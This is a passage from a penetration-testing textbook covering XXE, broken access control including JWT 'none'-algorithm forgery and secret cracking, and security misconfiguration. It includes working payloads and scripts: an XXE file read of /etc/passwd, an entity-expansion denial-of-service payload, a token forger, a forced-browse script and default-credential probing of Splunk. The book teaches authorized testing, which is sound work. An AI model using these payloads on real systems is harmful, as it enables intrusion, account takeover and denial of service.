Fatal Error 77: Premature end of data in tag uq line 2 Line: 6 Column: 6

Figure 5.11 Viewing response of manual request in ZAP.

In viewing this error output, we are presented with clues on how to modify
our input to resolve the errors and hopefully end up with valid XML syntax
that includes our payload (in this example the /etc/passwd reference). Let's
modify the attack input to try and resolve the errors. Based on the first error it looks like the standard XML prolog may be expected in this example, so adding in <?xml version='1.0'?> might help our efforts. There also seems to be an incorrectly typed quote, as both single and double quotes are being used. The tag mismatch errors may be corrected with the modifications already made. Resubmitting the request with ZAP now yields the expected /etc/passwd output, as seen in the respective request and response in Figures 5.12 and 5.13.

Figure 5.12 POST request showing XXE payload.


Figure 5.13 Response from application showing successful XXE attack.

Attacking a vulnerable API would be handled in much the same manner as


the HTML form, so for the next example let's turn our attention to a file upload XXE vulnerability. For this example we have an API which allows us to upload a file; an XML processor will in turn process the file and parse out the XML to save to a database and display to us for confirmation. To attack this file upload feature with the XXE vulnerability we will want to create a file containing our XXE injection payload. As previously learned, syntax
matters so we need to be sure our formatting is correct, our syntax is valid,
and our payload is suitable for the operating system we are targeting. Most
public APIs include documentation we can leverage to understand how to
communicate with them and produce valid requests, as seen in Figure 5.14.

Figure 5.14 API documentation including Curl request syntax.


Using this documentation we can figure out how to craft a working request that would include the required HTTP headers (key and resource) and a file (NewUser) containing the XML to create the user. The sample XML for such a request can be seen in Figure 5.15.

Figure 5.15 XML required to create a new user.


A legitimate request to the API and the subsequent results would look like
Figure 5.16:

Figure 5.16 Curl request from command line.

The command is:


curl -H "key:44A00A7C0BC7D00826068281834F76C3" -H "access:user" -d
@NewUser http://10.0.0.193/API
Subsequently, the results echo the newly created username and other ac-
count information indicating a valid request. At this point we have success-
fully submitted a request to the API and need to focus on attacking it. To
do so we can simply alter our NewUser file to include the malicious payload
which will be similar to previous XXE payloads. An important note to re-
member is that our syntax needs to be valid just as we need to satisfy the
requirements of the API, thus if an API key is required or a special header
and specic parameters (or XML tags), we need to be sure we include those
as well. The modifications to the NewUser file can be seen in Figure 5.17 along with the resulting exploitation of the XXE vulnerability in Figure 5.18.

Figure 5.17 Malicious XXE attack.
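A malicious NewUser file of the kind shown in Figure 5.17 might look something like the sketch below; the user-creation element names are assumptions standing in for the real tags shown in Figure 5.15:

```xml
<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">  <!-- malicious external entity -->
]>
<user>
  <username>&xxe;</username>  <!-- file contents echoed back in the API's confirmation -->
  <email>attacker@example.com</email>
</user>
```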


Figure 5.18 Results of XXE attack showing successful retrieval of sensitive


information.

In a production environment, leveraging this XXE/API flaw would result in a
potentially significant number of new users being created with bogus account
information. Exploring this concept could lead one to contemplate a denial of
service scenario, and in fact, this is another potential result of XXE. To perform
a denial of service, a malicious user could submit self-referencing entities
so that entity "a" references entity "b", which references entity "a", and so on;
this would cause a vulnerable XML processor to consume resources as it attempts
to process what is essentially an infinite loop of entities. Due care is required when
attacking production systems and, as previously mentioned, DoS is rarely
in scope, so proceed with caution.
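The self-referencing entity idea just described is closely related to the well-known "billion laughs" expansion payload, in which each entity expands to many copies of the previous one. A minimal sketch (trimmed to three levels; a real payload would use ten or more, and entity names are illustrative) might look like:

```xml
<?xml version="1.0"?>
<!DOCTYPE bomb [
  <!ENTITY a "laugh">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<bomb>&c;</bomb>
```

Each additional level multiplies the expansion by ten, so a ten-level version forces a vulnerable parser to materialize billions of copies of the innermost string. Again, only attempt this against systems where DoS testing is explicitly in scope.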

Link to hands-on portion: https://tptgtwa.com/owasp4


Root Cause and Conclusion: Denial of service, information disclosure,
and remote code execution are possible when exploiting XXE; the impact
depends on the configuration of the XML processor. When creating the labs
and demos for this chapter I found that by default several popular XML
processing solutions were vulnerable to XXE, and in fact, a developer would have
to dedicate special attention to securely handling input in order to provide an
effective control against this attack. Additionally, there are a limited number
of tools available to help identify or exploit this vulnerability. A quick web
search will likely yield fewer than five such tools, and of those five maybe one
has been recently updated. Nevertheless, they do exist and can aid in some
out-of-band (OOB) attacks as well as basic exploitation such as file/directory
enumeration. As with any vulnerability, the risk of XXE needs to be taken in
the context of the finding and the potential for impact. With that being said,
it should not be overlooked during testing or underrated as a useful means
to, at a minimum, gather additional information about a target.
Chapter 6

OWASP A5:2017 Broken Access Control
Definition: Restrictions on what authenticated users are allowed to do are
often not properly enforced. Attackers can exploit these flaws to access
unauthorized functionality and/or data, such as access other users' accounts,
view sensitive files, modify other users' data, change access rights, and so on.

Details: Access control is all about authorization: the permissions a given
user has and what the user is authorized to do. In most cases the application
in question performs some type of authentication when the user proves they
are who they say they are, and subsequent requests are checked to ensure the
user has a valid session and that the user is allowed to access the resource
they are requesting. This is a critical check that applications must perform
whenever a user attempts to access a resource. This resource could be
functionality intended for administrative users, or it could be a feature specific
to a user account or other component of the application. When this access
control is not in place or not functioning properly, the flaw would typically
fall under this category of vulnerability (broken access control). A common
way applications are written is to logically check, near the top of a page's
source code, whether a user is logged in as well as what their role is (what
permissions they have). This logic can be as simple as connecting to a database
and executing a SELECT statement to obtain the user's role and then determining
if that role is sufficient to access the page or otherwise honor the request
the user submitted. PHP, Ruby, Java, .NET/C#, and other commonly used
programming languages all provide a method to control access to objects and
resources within a web application. Because of this, access control exists in
many applications; it is just oftentimes poorly implemented, hence its place
as number five on the OWASP top ten. One of the challenges of implementing
this control properly is the complexity of applications, a potentially vast
number of roles and resources to keep track of, as well as increasing attack
surface via exposed APIs. From an attacker's perspective, identifying broken
access control lends itself to manual testing in the sense that automated
tools are not well suited to discover this flaw. Web application vulnerability
scanning tools can detect when access controls are not in place but they
generally fail to detect if the controls are working as intended. This is because
a tool doesn't understand what a privileged function or resource is unless it
is programmed to specifically look for one. In terms of scanning tools, this
level of specificity or custom application development does not scale across
unique applications and thus a manual approach works best. With that being
said, there are some tools that can at least point us in the direction of broken
access control, and this is what we are looking for: the ability to access pages
we should not be allowed to access, the ability to submit forms we should
not be allowed to submit or API calls we should not be allowed to execute,
the ability to escalate privilege, and finally the ability to circumvent or
otherwise bypass access controls in general.
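As a concrete illustration of the page-top role check just described, here is a minimal sketch in Python (the table layout, column names, and roles are hypothetical, not taken from any particular application):

```python
import sqlite3

def authorize(db: sqlite3.Connection, username: str, required_role: str) -> bool:
    # Look up the user's role and decide whether it is sufficient for
    # the requested page; the application must run this check on every
    # privileged request, not just at login.
    row = db.execute(
        "SELECT role FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row is not None and row[0] == required_role

# Demo with an in-memory database
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, role TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")
print(authorize(db, "alice", "admin"))  # True
print(authorize(db, "bob", "admin"))    # False
```

Broken access control typically arises not because a language lacks this capability, but because a check like this is missing or inconsistent on one of the pages that needs it.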

Real-World Dialog: One of the more interesting examples of broken access
control I discovered was coupled with an authentication bypass flaw and
allowed me to gain access to arbitrary user accounts. The flaw existed on the
login pages of the application, where the flow consisted of a page requesting a
username followed by another page requesting a password. This can be seen
in Figure 6.1 and Figure 6.2.

Figure 6.1 Initial login page for application.

Figure 6.2 Second login page for application.

The login process looks simple enough; the problem is that the authorization
(as well as authentication in this case) occurred as soon as the username
was submitted. Specifically, by inputting a valid username I was able to gain
access to that user's account while completely bypassing the rest of the login
process. I have come across issues like this on various web applications, the
root cause of which stems from a broken access control system: a failure to
validate the request properly before granting access. To elaborate on how this
was possible, keep in mind that this was a white-box test, so I had access to
several valid accounts. I proceeded to start the login process using one of the
test accounts and took note of what page I was redirected to (home.aspx)
once I successfully authenticated to the application. With this information
I logged out, submitted a different username on the first login page, and
then simply force browsed to home.aspx, which ended up showing me as
logged in and authorized to access all of the account features for this user.
The hard part was categorizing this vulnerability as it's clearly an example
of broken authentication just as it's indicative of broken access control. We'll
explore this and techniques for exploitation in more detail next.

How to Exploit: Exploiting a broken access control scenario as an attacker
requires us to once again perform our due diligence in properly and thoroughly
mapping the application to identify potential attack surface and areas
where the possibility of broken access control might make sense. To do this we
want to leverage our interception proxy (Burp Suite or ZAP) with an authenticated
account, paying special attention to administrative functions/pages.
When we come across a request which is suspect or would benefit from
additional scrutiny, we can make a note or comment directly from within our
tool, as seen in Figure 6.3.

Figure 6.3 Adding a comment within Burp.


Subsequently we would sort by the comment column within Burp once we
are satisfied with our mapping endeavors, and follow up with the notated
requests. But how do we know if a request deserves further scrutiny? Think
back to the flaw we are trying to identify (broken access control) and focus
on requests exposing the username or administrative features of the application.
For instance, administrators may be allowed to provision accounts,
change passwords, add rules, configure the system, and so on; what we want
to do is take note of the request being made when one of these administrative-level
requests is submitted and simply try to duplicate it as a regular user
or as an unauthenticated visitor of the website. Remember, as a professional
penetration tester it is not uncommon to request administrative-level access
to the application. It is in this manner that we can fully explore all of the
features of the application and perform a thorough test of the application. On
this subject, here is a word of caution: running an automated vulnerability
scanning tool with administrative credentials is a great way to cause harm,
so avoid it unless scanning a non-production-impacting version of the application.
As an aside, an environment dedicated to UAT could have the ability
to interact with production databases depending on how it's configured; be
careful and know the environment. Also ensure regular backups are made of
the web application and a mature restoration process is in place. To reiterate,
use administrative credentials (if you have them) in a manual and controlled
way while making notes of privileged features/functions/requests, but don't
use those same credentials as part of an automated scan of the application.
We can also attack GET request parameters and POST payloads to manipulate
client-side data in the hopes of exploiting the application. There are
some attacks we can consistently execute regardless of the application to try
and identify flaws, whereas in other cases, the very nature of attacking a
custom-built application means that our attack also needs to be customized
to the environment. A useful method to help identify potential access control
issues is to leverage Google. In fact, Google dorks can be quite useful, as
using Google's efforts to spider the site allows us as attackers to passively find
flaws. This is a passive attack because we are simply using Google's search
results (and consequently only interacting with Google at this point) to try
and ascertain whether an application has directory browsing/indexing enabled.
Directory indexing is a web server configuration setting which allows
the contents of a directory to be shown in a tree/hierarchical view, in essence
showing all of the files in a given folder. This view will be shown when browsing
to the root directory of a website which has this feature enabled. We can
see an example of this in Figure 6.4.

Figure 6.4 Directory browsing output.

While this is a configuration setting from a server administrator's perspective,
it is also considered an information disclosure vulnerability in certain
circumstances. Directory indexing can make our job easier as attackers
because we can now see all of the resources that may be lacking access controls
or exposing source code (in the case of backup files), which we can use to
reverse engineer access controls which may be weak.

Examples: Search engines do a good job of scanning the web, finding publicly
available websites and data, and making this information available for
us to easily search. When a website is misconfigured and subsequently leaking
sensitive information, divulging error messages (useful for SQL injection,
for example) or other information we can use to attack it, Google, Bing,
Shodan, and other search engines often encounter this, save it, and make
this information available to search as well. This situation is not limited to
websites and error messages, but extends to any internet-connected device and any
useful information including version numbers. Think about it from this
perspective: if we can use a search engine to quickly find which websites are
running version x.x of software z (like OpenSSL version 1.0.1f) and there
is a known exploit for this version of the software, then we can leverage
the search results to compile a list of hosts to attack. In some situations
the search results themselves will leak the sensitive information attackers
are seeking, and these are the concepts behind Google dorks. As Google is
the best at what it does in the search realm, it is the de facto tool used
to identify some classes of vulnerabilities including those leading to broken
access control. Successfully using Google to obtain this type of information
relies on us knowing the various search operators and how to wield them
correctly. The basic syntax to obtain search results showing only results from
our target website is site:example.com, where example.com is replaced with
the actual target web application (note there is no space between the colon
and the target). This is useful for reconnaissance as it will output all of the
different hosts (like www.example.com, ftp.example.com, login.example.com,
api.example.com, dev.example.com, etc.) Google is aware of and allowed to
show for the target domain, which we can further filter with the - sign to
exclude certain, perhaps already known, hosts. See Figure 6.5 and Figure 6.6
for examples.

Figure 6.5 Results of Google's site directive.



Figure 6.6 Results of a more complex Google search query.

Let's add to this by introducing more operators to further narrow down
exactly what we are looking for, such as directory browsing and interesting
documents. Documents like PDFs, DOCXs, images, and the like can have
embedded metadata which we can parse through to gain access to potential
usernames, details on the version and software used to create the documents,
and other interesting information we can use to our advantage. This is
accomplished by simply adding the ext operator with an accompanying extension,
like site:example.com -www.example.com ext:pdf. This will show results from
all hosts on the example.com domain except for the www.example.com website
and should only display PDF documents. We can subsequently click on
each link and download each PDF (or automate this process) and then use
exiftool to search for interesting metadata as shown in Figure 6.7.

Figure 6.7 Metadata output as seen from command line using exiftool.

Directory browsing/indexing (it's known and referenced by both names) can
be found with the Google dork "index of" and will yield results similar to those
shown in the How to Exploit section of this chapter. By further filtering
the results with additional operators, however, we reduce the potential
number of out-of-scope results.
There are caveats with this method of searching for known flaws, such
as the limitations of Google in terms of what it is allowed to show/index. A
website administrator can direct web crawlers (like the Google and Bing bots)
not to index their website; this will effectively ensure zero or at most minimal
Google/Bing results for the target domain in most cases. In addition, Google
will not allow a significant number of search requests using operators from
the same client in a short period of time without challenging the client with
a CAPTCHA. This is done in an effort to combat automated searches and
abuse of the Google search service and can significantly hamper our efforts.
Even with these minor limitations we will still ultimately obtain a list of
potentially interesting file and folder paths worth investigating. The act of
browsing to files we should not have access to or that are otherwise not linked
or publicly known is called forced browsing and is nothing more complicated than
attempting to access various pages of a website with a browser or automated
tool. For example, if we use every popular search engine to search for
example.com, none of the results will show the page example.com/sensitivepage.html
even though it exists (in this hypothetical example). However, we can simply
open our browser and manually browse to that page, and this is the concept
behind forced browsing, only with a bit more intelligence by using
preconstructed lists of popular/common page names and directory listing results
which may not otherwise be indexed by search engines. ZAP has a built-in
feature called Forced Browse which does just this; it used to be a standalone
tool called DirBuster but has since been incorporated into the core
functionality of ZAP (Figure 6.8).

Figure 6.8 ZAP's force browsing option.

By selecting the target application we want to force browse, we can start the
tool and view the results, which will show us available directories (or files as
the case may be); basically, responses from the website which do not contain
a 404 response code. We do, however, in most cases want to tune the tool to
use a custom list, or at least modify the default word list to include files and
folders we are already aware of from our reconnaissance, directory browsing
results, and previous engagements, to be the most effective. Figure 6.9 shows
the results of a Forced Browse attack.

Figure 6.9 Initial results of forced browse.

The results of the forced browsing attack will often yield directories and pages
which should not be exposed externally, or are missing the appropriate access
controls respectively. As with the results from other tools, it is incumbent
upon us to manually verify the results and use them to further our goals of
gaining access to the target system.
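The core behavior of a forced-browse tool can be approximated in a few lines. The sketch below keeps every response that is not a 404; the target URL and word list are placeholders, and any real use must of course stay within scope:

```python
import urllib.error
import urllib.request

def forced_browse(base_url: str, wordlist: list[str]) -> list[tuple[str, int]]:
    # Request each candidate path and keep anything that does not come
    # back as a 404, mirroring ZAP's Forced Browse / DirBuster behavior.
    found = []
    for name in wordlist:
        url = f"{base_url.rstrip('/')}/{name}"
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                found.append((url, resp.status))
        except urllib.error.HTTPError as err:
            if err.code != 404:
                found.append((url, err.code))
        except urllib.error.URLError:
            pass  # host unreachable; skip this candidate
    return found

# Example (placeholder target and word list):
# forced_browse("http://10.0.0.193", ["admin/", "backup/", "config.php"])
```

A production tool would add concurrency, redirect handling, and smarter filtering of "soft 404" pages, but the decision logic is the same.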
Poorly configured web applications may expose elements responsible for
access control to the client in GET parameters, hidden form fields, cookies,
and other areas typically used to handle session state. In the case of
parameters, these can be aptly named admin, role, userlevel, or similar, with
an associated numerical value denoting the type of access/privilege. In cases
when such a parameter exists, we want to attempt to modify the value to see
if by changing the value we can modify our level of access. Figure 6.10 shows
an example of various parameters and values.

Figure 6.10 URI and applicable parameters.

In this example, by changing admin=0 to admin=1 and resubmitting the
request, we may be able to escalate our level of privilege to that of an
administrator. When this is possible, the root cause of the flaw is a lack of
proper access control. Paying special attention to interesting parameters is
another recurring theme; the challenge can be discerning between interesting
and ordinary. Sometimes the interesting elements are evident, and other
times practice, good note taking, research, and above all fuzzing are the best
methods to determine what an interesting element is in the context of our
target application. We can't always rely on version numbers or readily known
information to guide our efforts, but with the proper tools and mindset we
can succeed in identifying and exploiting elements associated with broken
access control and other flaws for that matter.
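Tampering with such a parameter is easy to script. The sketch below rewrites the query string before the request is resubmitted; the admin parameter name comes from the example above, while the URL and other parameters are hypothetical:

```python
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

def flip_admin_flag(url: str) -> str:
    # Rewrite the query string so that admin=0 becomes admin=1,
    # leaving every other parameter untouched.
    parts = urlparse(url)
    params = parse_qs(parts.query)
    params["admin"] = ["1"]
    return urlunparse(parts._replace(query=urlencode(params, doseq=True)))

print(flip_admin_flag("http://target.example/account.php?user=bob&admin=0"))
# http://target.example/account.php?user=bob&admin=1
```

The same approach works for role, userlevel, and similar parameters; fuzzing a range of values is often more revealing than testing a single guess.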
Another common example of broken access control centers around the
JSON Web Token (JWT), a stateless mechanism described in RFC
7519 and used for authentication. A JWT can be thought of as a digitally signed
container carrying identification information such as a username, level of
permission, associated claims, expiration time, and so on. The JWT is comprised
of three parts: a header, payload, and signature, collectively constructed as a
variable-length Base64-encoded string of characters separated by two periods.
This is shown in Figure 6.11.

Figure 6.11 Encoded JWT.

The string of characters preceding the first period (the header) denotes the
algorithm used to sign or encrypt the payload (in some cases) and the token type,
such as HS256 (HMAC with SHA256) and JWT, respectively. The next string
of characters, between the two periods, is the payload. The final string of
characters is the signature, which is calculated using a secret key over
the values of the header and payload (once again in some cases, as JWTs don't
have to be encrypted and can instead be digitally signed). Like many things
in cyber security, when implemented correctly a JWT does a good job for its
intended purpose; it's when the implementation is flawed that we find ways
to exploit it.

As it pertains to the security of JWTs, two of the main things we want
to test are the strength of the secret key used for signing and weaknesses
in libraries blindly accepting none as the hashing algorithm. The example
application shown in Figure 6.12 uses JWT for authentication, as we can
see from the HTTP response header sent to our browser after the initial
successful login request, depicted in Figure 6.13.

Figure 6.12 Login page for application.

Figure 6.13 Receiving JWT upon successful authentication.

From here we have access to the JWT of:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwibmFtZSI6Imd1ZXN0IiwicHJpdiI6NX0.-IeJzAnH8Mzc0yuv6_qInbqJ0M9fmZopm0EZt6s4IH0

the header and payload of which we can easily decode with Burp, ZAP, or on
the Linux command line with base64 -d, as seen in Figure 6.14.

Figure 6.14 Decoding JWT with base64 command line utility.
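The same decoding can be done in a few lines of Python. Note that JWT segments use base64url encoding with the padding stripped, which base64 -d and most decoders require, so the padding is restored before decoding:

```python
import base64
import json

def decode_segment(segment: str) -> dict:
    # JWT segments are base64url with padding stripped; restore it first
    segment += "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(segment))

# Header and payload from the token shown above
print(decode_segment("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"))
# {'alg': 'HS256', 'typ': 'JWT'}
print(decode_segment("eyJ1c2VybmFtZSI6Imd1ZXN0IiwibmFtZSI6Imd1ZXN0IiwicHJpdiI6NX0"))
# {'username': 'guest', 'name': 'guest', 'priv': 5}
```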

With this information we can see the user authenticated as a guest with what
seems to be a privilege level of five. At times there is sensitive information
in a JWT that is important for us to identify, as it may be useful for further
attacks. This token is signed, which means that while we can easily see what the
header and payload contain, and even change these contents, if we do so
and resubmit the token, the server or API should reject our request based
on a signature mismatch stemming from our tampering. However, we can
attempt to simply change the algorithm from HS256 to none, remove the
signature, change guest to administrator, and resubmit the token. This could
be accomplished with ZAP's encode/decode feature; see Figure 6.15 through
Figure 6.18 for details.

Figure 6.15 Using ZAP to initially decode a string.



Figure 6.16 Using ZAP to subsequently encode a modified string.

Figure 6.17 Using ZAP to manually submit a modied JWT.



Figure 6.18 Evidence of access to the administrator's account.


An administrative level of access was granted because the endpoint accepted
the token with a modified header representing the algorithm as none, coupled
with the modified payload claiming administrative access.
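The alg-to-none manipulation can also be scripted rather than done by hand in an encoder. A minimal sketch follows; the claim names are copied from the guest token shown earlier, while the administrator values (including the privilege number) are guesses for illustration:

```python
import base64
import json

def b64url(data: bytes) -> str:
    # base64url encoding with the padding stripped, as used by JWT
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(payload: dict) -> str:
    # The header advertises the "none" algorithm; a vulnerable verifier
    # will then accept the token with an empty signature segment.
    header = {"alg": "none", "typ": "JWT"}
    return (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
        + "."  # trailing dot: empty signature
    )

token = forge_none_token({"username": "administrator", "name": "administrator", "priv": 1})
print(token)
```

Submitting the forged token in place of the original (in the same header or cookie the application used) tests whether the library rejects the none algorithm as it should.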
To attack weaknesses with the secret key, we focus our efforts on a dictionary
attack. John, as well as hashcat (which we used in earlier chapters), can
be compiled to support JWT cracking. When the JWT verification secret
is sufficiently weak or our cracking machine is sufficiently powerful, we can
obtain the original secret from the JWT (as seen in Figure 6.19). With an
exposed secret we can now sign our own tokens and grant our own access to
the target application.

Figure 6.19 Using John The Ripper to crack JWT.



Link to hands-on portion: https://tptgtwa.com/owasp5


Root Cause and Conclusion: JSON Web Tokens are not inherently
insecure, and in fact are quite handy in certain circumstances such as stateless
API authorization. Likewise, the exploitation of the other topics discussed
in this chapter, as with the JWT example, stems from poor
planning/implementation and a lack of offensive testing. Broken access control
comes in many forms due to the myriad ways the complex task of implementing
authorization is often executed. It's challenging to write a secure, robust, and
user-friendly application, and as attackers we want to make sure we are
doing our part to test for weaknesses in design.
Chapter 7

OWASP A6:2017 Security Misconfiguration
Definition: Security misconfiguration is the most commonly seen issue. This
is commonly a result of insecure default configurations, incomplete or ad hoc
configurations, open cloud storage, misconfigured HTTP headers, and verbose
error messages containing sensitive information. Not only must all operating
systems, frameworks, libraries, and applications be securely configured,
but they must be patched and upgraded in a timely fashion.

Details: The topic of web application security misconfigurations encompasses
a broad scope of issues and includes flaws in every part of the stack.
Some of the issues representative of this category have already been touched
on, such as default passwords and directory browsing, but the core of this
category focuses on poor baseline hardening.

One of the challenges (and subsequent reasons why findings in this category
are prevalent on many penetration testing reports) with implementing a
consistent security baseline for new web applications is the propensity of modern
web applications to be highly complex and disparate. Fifteen to twenty
years ago it was much more common to have IIS and MSSQL along with
.NET, an installed SSL certificate, and in essence the entire stack running on
one box. What we learned from this architecture is that it's not fault tolerant
(single points of failure), not capable of handling high volumes of traffic, and not
feasible to patch without scheduling a maintenance window. These realities
gave way to load balancers sitting in front of web farms with dozens of web
servers and database servers replicating to multiple datacenters, and this was
the status quo for over a decade; it's how we arrived at a point where we could
not only patch vulnerabilities, update certificates, and manage/inspect traffic
flow, but also upgrade our codebase in real time without impact. This idea
of automating the maintenance and succession of dozens of moving parts, all
of which are driven by software and version control, gave way to a devops
approach of continuous integration, continuous delivery, and constant change to
the environment. While adoption of true devops is still not extremely prevalent
in most larger companies, the underlying concepts of devops have taken
hold in many organizations, and as a result weekly sprints, regular change
advisory board (CAB) meetings, and adoption of cloud services/platforms are
very common. This newer method of automating implementation, delivery,
testing, and so on sets heightened expectations on the quality of security,
and can also result in a complex system requiring constant attention to
ensure stability, fluidity, and adherence to business requirements. As a result
of the constant state of flux, establishing baseline hardening principles and
continuing to implement them becomes difficult if the process is not
constantly updated or elegantly automated.

Because of this and other competing priorities, it is often found that
default settings are left unchanged, debugging is enabled on production systems,
unnecessary services are found to be running, and secure build documents are
not maintained on paper or followed in practice. Change management ticket
requests to allow firewall rules for a new server build in the DMZ are approved
because the business needs outweigh the security concerns and "scanning
after the go-live will find all the issues". Security professionals often see the
missteps of typical business operations, the corners cut, and the aftermath
of doing so over an extended period of time, as the results are evident the
first time we conduct a penetration test. If you are not privy to these realities,
know that they happen every day due to an example scenario like the
one just mentioned, or due to incompetence/ignorance, or just poor business
practices. Malice is almost never a factor; humans want to do the right thing
most of the time, and in a for-profit business environment, keeping systems
online and ensuring continued revenue is the right thing to do.

Real-World Dialog: I teach several classes for the SANS Institute, and in
some of the discussions with students the topic of server hardening comes
up. We look at Netcraft results and the adoption of security headers and
SSL/TLS configurations on varying websites, and invariably the value of the
Server header (as seen in Figure 7.1) is brought up.

Figure 7.1 Response headers as seen from a browser's development tools.

Why divulge the real value for this header? Why tell everyone we are running
Apache with various modules compiled and their associated versions? Is there
any value in doing so, and is there any increase in security if we hide or alter
these values? These questions will almost always result in a spirited conversation
about security through obscurity (just because we hide the value doesn't
mean any vulnerabilities associated with our version of software disappear...),
software popularity metrics (how else can we measure how prevalent Apache
is compared to others...), with me steering the conversation to whether we believe
the value is accurate (or how we might verify its accuracy). In practice, the
most I have seen done to the Server header value is hiding it or completely
removing it, and I see this about 3% of the time. The other 97% of the time
the header is divulged, accurately portraying the underlying software being
used to serve the website. Why? Because 3% of the time a WAF hides this
header by default, and the other 97% of the time absolutely no one with the
ability and level of access required to make this change has ever had so little
work to do that the task of "changing the default Server header" has risen to
the top of their priority list. Of course, I have not confirmed this, but something
tells me I am right... Another thing that doesn't always get changed
is default passwords for commercial software.
During the internal portion of a network penetration test, a colleague came
across an IBM WebSphere server, and in doing his due diligence (researching
and identifying potential default administrative passwords) was able to log in
with administrative rights simply using the vendor-documented default login
credentials. This was a production system hosting a multitude of websites
while running atop a Windows 2016 enterprise server. With administrative
rights we were able to deploy arbitrary WAR files, among other things,
resulting in a running instance of our custom code. With this functionality I
wrote a simple JSP page with an input box allowing for command
execution/injection. Whatever command we submitted to the form was executed
on the Windows server with *system* privilege. An encoded MSF PowerShell
payload spawning an Empire agent ensued, as did our initial foothold into
the network.
A common fallacy I had before I gained experience at various companies
was that larger organizations were more secure than smaller ones. My thought
process was based on the notion that a large company has lots of money, and
therefore has more security staff and the latest or best technology across the
enterprise. If the company didn't have the best technology and the smartest
people maintaining the infrastructure, then surely they would not remain
on the cutting edge for long, and their role as a profitable leader in their
industry would diminish over time. That was my logic, and needless to say it
was significantly flawed. What I learned is embodied in the bulk of this "Real-World
Dialog" section of this chapter. Complexity breeds insecurity, and the
more technology, the more stuff a company has, the harder it is to keep track
of everything. With that, let's turn our attention to how to exploit security
misconfigurations.

How to Exploit: To know if something is insecurely configured we have to have an indicator, and to make that determination or otherwise identify the indicator there is no substitute for research and due diligence, as we saw in the last example. As penetration testers we will come across a plethora of commercial software, the majority of it complete with a web interface or API. When presented with this interface we want to initially focus on two primary things as it relates to the identification of security misconfigurations: checking for default credentials and identifying the software versions in use to check for known/published vulnerabilities. Recall that the entire stack is typically in-scope during a web application penetration test, and this encompasses everything from the OS through to the web server, framework, custom code, content management system, plugins, TLS implementation, databases, and perhaps any running service discovered on the target machine. If, upon accessing the web interface with our browser, we are presented with, or can navigate to, a login page, we want to take note of the name of the software being used to serve the page (usually this appears directly on the home page, in the HTML title or source code, or there are clues in the HTTP response headers). In addition to identifying the software all the way up the stack, we also want to make note of the version of the commercial software we are interfacing with. As we can see in Figure 7.2, the commercial software is clearly Splunk Enterprise.
OWASP A6:2017 Security Misconfiguration 101

Figure 7.2 Commercial software with web front-end.

Upon closer examination we can narrow down which version of Splunk is used by reviewing the HTML source code, paying attention to JavaScript references, and eventually coming across a link to the help section. This will ultimately redirect to the Splunk website, but not before divulging the current version of Splunk (version 7.0.1, as seen in Figure 7.3):

Figure 7.3 The identified version number.

With this information the next step is to search for known default credentials and known vulnerabilities; useful resources to aid in this step are CIRT (cirt.net/passwords) and the CVE list (cve.mitre.org), respectively. A quick search through CIRT for Splunk passwords shows only one set of credentials, as seen in Figure 7.4.

Figure 7.4 CIRT's single default password for Splunk.

A search on the CVE list shows our version of Splunk as being vulnerable to
CVE-2018-11409, and contains a link to the exploit database where author
"KoF2002" has contributed a PoC (proof of concept) attack string as we can
see in Figure 7.5.

Figure 7.5 Proof of concept code for an information disclosure vulnerability.

At this point we logically want to try to log in with the default credentials and attempt to exploit the information disclosure vulnerability.
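Both checks can be driven from the command line with curl. In the sketch below, the hostname is a placeholder, admin/changeme is the default pair listed by CIRT, and the server-info path is the one circulated in the public CVE-2018-11409 PoC; verify it against the Exploit Database entry before relying on it:

```shell
#!/bin/sh
# Placeholder target; Splunk Web commonly listens on port 8000.
TARGET="https://splunk.example.com:8000"

# Vendor-documented default credentials (admin/changeme) as a Basic header token.
AUTH_TOKEN=$(printf 'admin:changeme' | base64)

# Unauthenticated information-disclosure endpoint from the published PoC
# (path is an assumption here -- confirm against the exploit-db write-up).
INFO_PATH="/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json"

echo "Authorization: Basic ${AUTH_TOKEN}"
# Uncomment to run against an in-scope, authorized host:
# curl -sk -H "Authorization: Basic ${AUTH_TOKEN}" "${TARGET}/en-US/account/login"
# curl -sk "${TARGET}${INFO_PATH}"
```

The live requests are left commented out; only run them against systems covered by the rules of engagement.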
Websites don't just run on ports 80 and 443, and though the target of our testing may be the primary web interface, we need to be cognizant of additional services listening on the target host. The most efficient way to identify additional running services is by using nmap. This tool can quickly determine which ports are open, and can probe to determine which service is running. Beyond basic port scanning, however, nmap comes with a series of built-in scripts as part of the NSE (Nmap Scripting Engine) which we can use to identify vulnerabilities in some cases and further expose information about the target system. Basic invocation of the tool will help identify listening services by scanning, as a default setting, the 1,000 most popular/common ports on a target system. Figure 7.6 shows the results of such a scan.

Figure 7.6 Results of nmap being executed without any arguments/parameters.

The ports identified as open have the associated service description displayed as part of the output, but to ensure nmap is actually probing to determine the true listening service and its version, we want to specify the -sV option as part of our command. Doing so may change a previously unknown result to a description of the actual service running on the given port as well as the identified version. It's also prudent to enable OS detection as a matter of course in most situations, and to run some basic NSE scripts as well as a traceroute for thoroughness. Nmap provides the "-A" option to do all of this in one command; that is, what would normally be a command consisting of "nmap -sV -O --traceroute --script=default" can now be executed as "nmap -A" with the intended target(s) indicated as part of the command. The results are visible in Figure 7.7.

Figure 7.7 nmap being invoked with "-A".

